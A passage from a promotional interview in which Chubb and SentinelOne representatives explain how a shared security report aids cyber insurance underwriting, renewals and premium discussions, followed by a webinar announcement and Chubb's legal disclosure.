Chubb/Guiliano: The VSR will be available to view by Chubb in near real-time, allowing efficient and timely feedback to policyholders, brokers, and underwriters. Chubb and SentinelOne have also worked to minimize the sensitivity of the data being shared with Chubb. We omit any sensitive information, including IP addresses associated with identified vulnerabilities.

Q: How can the VSR help organizations with risk transfer?

Chubb/Guiliano: Traditionally, our underwriters use a series of questions and attack surface information to evaluate a policyholder’s risk. They might also pull historical data from claims that the policyholder has submitted. However, this kind of risk assessment doesn’t give us the full picture and could include false positives. The VSR provides a clearer, more accurate, and more efficient mechanism for our policyholders’ security teams to communicate information and controls to our underwriting teams.

The report will reduce the time and overhead that our policyholders spend. Additionally, it gives the policyholder a chance to think critically about their cybersecurity through access to Chubb’s expertise on risk-of-loss indicators, such as known vulnerabilities and common attack vectors – expertise that is based on 20+ years of actual loss data.

SentinelOne/Mead: The VSR helps organizations with their risk transfer by bringing visibility to their telemetry. SentinelOne has configured and crafted the VSR to identify vulnerabilities, configurations, and asset management controls with Chubb’s review to help policyholders proactively identify exposures. The information provided by the VSR will enable the policyholders to remedy elements that may need improvement, enhance their cybersecurity posture, and ultimately lower risk profiles. The VSR allows policyholders to discuss renewals more confidently with Chubb and brings more transparency to those conversations.

Q: What benefits may accrue from participating in the VSR Program?

SentinelOne/Mead: From a technical perspective, the VSR is an accurate and efficient way to assess a company’s cyber security posture. Current SentinelOne clients can look at the VSR and craft clear action items to enhance their use of our tools.

Chubb/Guiliano: Any benefit to our policyholders’ risk profile is a benefit to Chubb at large, and we’re eager to see our policyholders develop greater insight into their cyber risk profile and thus gain more informed negotiating power within the cyber insurance marketplace and possible premium savings.

Learn More

On May 2, 2024 at 1:00PM ET, join SentinelOne, Chubb, Aon, and CyberAcuView for a webinar discussion on data-driven underwriting. Panelists will discuss how data has transformed underwriting and insurability assessments as businesses work with their carriers and brokers to improve their risk profiles.

Data Sharing in Cyber Insurance
Having the right telemetry streamlines underwriting and renewals, leading to benefits for the policyholders.

Chubb Disclosure: Chubb is the marketing name used to refer to subsidiaries of Chubb Limited providing insurance and related services. For a list of these subsidiaries, please visit our website at www.chubb.com. Insurance provided by ACE American Insurance Company and its U.S. based Chubb underwriting company affiliates. All products may not be available in all states. This material contains product summaries only. Coverage is subject to the language of the policies as actually issued. Surplus lines insurance sold only through licensed surplus lines producers. The material presented herein is advisory in nature and is offered as a resource to be used together with your professional insurance advisors in maintaining a loss prevention program. It is not intended as a substitute for legal, insurance, or other professional advice, but rather is presented for general information only. You should consult knowledgeable legal counsel or other knowledgeable experts as to any legal or technical questions you may have. Chubb, 202 Hall’s Mill Road, Whitehouse Station, NJ 08889-1600